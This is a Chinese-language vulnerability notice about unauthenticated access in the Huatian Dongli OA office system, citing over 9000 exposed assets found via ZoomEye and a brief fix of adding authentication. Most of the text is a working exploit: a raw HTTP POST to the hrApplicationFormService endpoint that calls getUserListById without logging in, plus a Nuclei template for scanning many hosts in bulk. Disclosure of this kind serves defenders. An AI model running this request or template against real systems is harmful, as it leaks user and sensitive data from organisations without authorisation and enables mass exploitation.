华天动力 OA 办公系统存在未授权访问漏洞

近期，华天动力OA被爆存在未授权访问漏洞，攻击者可以读取用户信息及敏感信息等，利用 ZoomEye搜索引擎进行搜索，发现影响资产9000+。

华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台，在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。

未授权访问漏洞在企业内部属于常见问题，其通常是由于安全配置不当、认证页面存在缺陷，或者根本就没有认证导致的。

通过ZoomEye网络空间搜索引擎搜索语法 app:”华天动力 OA”，发现受影响资产9000+，主要分布在中国。

修复建议：鉴权，对接口进行用户鉴权

附：漏洞复现

POC

POST /OAapp/bfapp/buffalo/hrApplicationFormService HTTP/1.1

Host: {}

Content-Length: 283

Pragma: no-cache

Accept: application/json, text/plain, */*

Cache-Control: no-cache

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

Content-Type: text/xml;charset=utf-8

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Cookie: JSESSIONID=E23F65531C015A84CE70FBBEAFDA5296Connection: close

<buffalo-call>

<method>getUserListById</method>

<boolean>1</boolean>

<string></string>

<string>2</string>

<string></string>

<string></string>

<boolean>1</boolean>

<boolean>1</boolean>

</buffalo-call>

批量检测POC（请自行搭建环境检测）

id: huatian-OA-information-disclosure

info:

name: huatian-OA-information-disclosure

author: HackTwo

severity: high

http:

– raw:

– |

POST /OAapp/bfapp/buffalo/hrApplicationFormService HTTP/1.1

Host: {{Hostname}}

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.9

Cache-Control: no-cache

Connection: close

Content-Type: text/xml;charset=utf-8

<buffalo-call>

<method>getUserListById</method>

<boolean>1</boolean>

<string></string>

<string>2</string>

<string></string>

<string></string>

<boolean>1</boolean>

<boolean>1</boolean>

</buffalo-call>

matchers-condition: and

matchers:

– type: dsl

dsl:

– ‘len(body)>1000’